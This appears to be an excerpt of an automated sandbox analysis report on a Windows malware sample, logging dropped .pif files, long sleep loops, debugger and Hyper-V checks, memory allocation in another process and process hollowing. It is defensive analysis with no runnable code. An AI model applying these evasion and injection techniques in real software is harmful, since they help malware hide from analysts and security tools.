Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594122s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -594013s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593903s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593794s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593685s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593575s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593466s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593356s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593246s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593138s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -593028s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592919s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592810s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592700s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592591s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592481s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592372s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5804	Thread sleep time: -592263s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep count: 32 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5716	Thread sleep count: 2380 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599765s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5716	Thread sleep count: 7470 > 30
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599656s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599437s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599328s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599217s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599109s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -599000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598890s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598781s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598672s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598547s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598437s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598328s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598218s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598109s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -598000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597890s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597781s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597672s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597547s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597437s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597328s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597218s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597109s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -597000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596890s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596781s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596672s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596547s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596437s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596328s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596218s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596109s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -596000s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595890s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595781s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595672s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595547s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595437s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595315s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -595108s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -594995s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -594890s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -594781s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -594672s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -594547s >= -30000s
Source: C:\Users\Public\Libraries\jphwmyiA.pif TID: 5548	Thread sleep time: -594437s >= -30000s

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_029358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029358B4

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599419	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598042	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595415	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595300	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594977	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594642	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594529	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594419	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594311	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599515	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599382	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599171	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599055	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598838	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598729	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598617	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598508	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598395	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598269	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598145	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597900	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597776	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597630	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597037	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596720	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596545	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596411	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596086	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595880	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595607	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595493	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595380	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595256	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595122	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595013	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594903	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594794	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594670	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594559	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594450	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594341	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594231	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594122	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594013	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593903	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593794	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593685	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593575	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593466	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593356	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593246	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593138	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 593028	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592919	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592810	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592700	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592591	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592481	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592372	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 592263	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599765
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599217
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 599000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598218
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 598000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597218
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 597000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 596000
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595437
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595315
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 595108
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594995
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594890
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594781
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594672
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594547
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Thread delayed: delay time: 594437

Source: yxU3AgeVTi.exe, 00000000.00000002.1688225604.000000000076E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: yxU3AgeVTi.exe, 00000000.00000002.1688225604.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jphwmyiA.pif, 00000003.00000002.4133669673.000000002353B000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1807179567.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4134001576.0000000027EDF000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000002.1882889147.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4140089339.000000001E3C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	API call chain: ExitProcess graph end node	graph_0-25586
Source: C:\Users\Public\Libraries\jphwmyiA.pif	API call chain: ExitProcess graph end node	graph_3-81976
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\jphwmyiA.pif	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_0294F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_0294F024

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 3_2_29247A28 LdrInitializeThunk,

3_2_29247A28

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0040CE09

Source: C:\Users\Public\Libraries\jphwmyiA.pif

3_2_004019F0

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_02948798 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02948798

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 3_2_0040ADB0 GetProcessHeap,HeapFree,

3_2_0040ADB0

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040CE09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040E61C
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00416F6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_004123F1 SetUnhandledExceptionFilter,	3_2_004123F1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_0040CE09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_1_0040E61C
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_1_00416F6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_1_004123F1 SetUnhandledExceptionFilter,	3_1_004123F1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Memory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Memory allocated: C:\Users\Public\Libraries\jphwmyiA.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section unmapped: C:\Users\Public\Libraries\jphwmyiA.pif base address: 400000	Jump to behavior
